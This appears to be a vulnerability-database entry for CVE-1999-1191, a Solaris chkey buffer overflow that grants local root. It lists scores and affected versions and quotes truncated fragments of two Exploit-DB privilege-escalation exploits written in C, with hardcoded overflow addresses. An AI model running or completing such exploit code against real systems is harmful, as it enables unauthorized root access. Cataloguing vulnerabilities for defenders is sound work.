CVE-1999-1191
published 1997-05-19CVE-1999-1191: Buffer overflow in chkey in Solaris 2.5.1 and earlier allows local users to gain root privileges via a long command line argument.
PriorityP428high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.94%
77.6th percentile
Buffer overflow in chkey in Solaris 2.5.1 and earlier allows local users to gain root privileges via a long command line argument.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | <= 5.5.1 | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
exploitdb·1997-05-19
CVE-1999-1191 Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
---
cat > ps_expl.po ps_expl.c
#include
#include
#include
#define BUF_LENGTH (632)
#define EXTRA (256)
int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
/* ps will grok this file for the exploit code */
char *envp[]={"NLSPATH=/tmp/foo",0};
u_long *long_p;
u_char *char_p;
/* This will vary depending on your libc */
u_long *proc_link=0xef771408;
int i;
long_p = (u_long *) buf;
/* This first loop smashes the target buffer for optargs */
for (i = 0; i < (96) / sizeof(u_long); i++)
*long_p++ = 0x10101010;
/* At offset 96 is the environ ptr -- be careful not to mess it up */
*long_p++=0xeffffcb0;
*long_p++=0xffffffff;
/* After that is the _ctype table. Filling with 0x10101010 marks the
entire character set as being "uppercase pr
Exploit-DB
Solaris 2.5.1 - 'chkey' Local Privilege Escalation
exploitdb·1997-05-19
CVE-1999-1191 Solaris 2.5.1 - 'chkey' Local Privilege Escalation
Solaris 2.5.1 - 'chkey' Local Privilege Escalation
---
/*
source: https://www.securityfocus.com/bid/207/info
The chkey program is used to change a users secure RPC Diffie-Hellman public key and secret key pair. A buffer overflow condition has been found in the chkey program. Since chkey has setuid root permissions, an unauthorized user may be able to gain root access.
*/
/*
* stdioflow -- exploit for data overrun conditions
* [email protected] (Adam Morrison)
*
* This program causes programs which use stdio(3S) and have data buffer
* overflow conditions to overwrite stdio's iob[] array of FILE structures
* with malicious, buffered FILEs. Thus it is possible to get stdio to
* overwrite arbitrary places in memory; specifically, it overwrites a
* specific procedure linkage table entry w
No writeups or analysis indexed.
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.18.solaris.chkey.buffer.overflow.vulhttp://marc.info/?l=bugtraq&m=87602167418335&w=2http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/144http://www.iss.net/security_center/static/7442.phphttp://www.securityfocus.com/bid/207ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.18.solaris.chkey.buffer.overflow.vulhttp://marc.info/?l=bugtraq&m=87602167418335&w=2http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/144http://www.iss.net/security_center/static/7442.phphttp://www.securityfocus.com/bid/207
1997-05-19
Published